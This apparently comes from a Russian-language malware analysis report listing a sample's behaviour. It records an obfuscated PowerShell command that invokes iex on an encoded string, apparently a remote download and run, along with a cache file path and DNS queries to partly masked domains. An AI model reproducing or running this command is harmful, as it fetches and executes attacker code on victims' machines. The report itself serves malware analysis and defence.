Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' .( $pSHome[21]+$PshOMe[30]+'x') (('21l70R121-127-12-95&84>70&28k94b83l91l84&82k69H17l127k84k69k31>102&84&83k114k93-88R84}95H69H10b21b100H71b67-12k22H89@69@69}65&11-30-30}70>70}70k31k93l80&82}80...
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\dyps348i\config14[1].txt
- DNS ASK la##ncha.pe
- DNS ASK be##.#oofitires.ir
- DNS ASK la###ttour.com
- DNS ASK el####icocml.com
- DNS ASK ba####nanarew.pl
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' .( $pSHome[21]+$PshOMe[30]+'x') (('21l70R121-127-12-95&84>70&28k94b83l91l84&82k69H17l127k84k69k31>102&84&83k114k93-88R84}95H69H10b21b100H71b67-12k22H89@69@69}65&11-30-30}70>70}70k31k93l80&82}80... (со скрытым окном)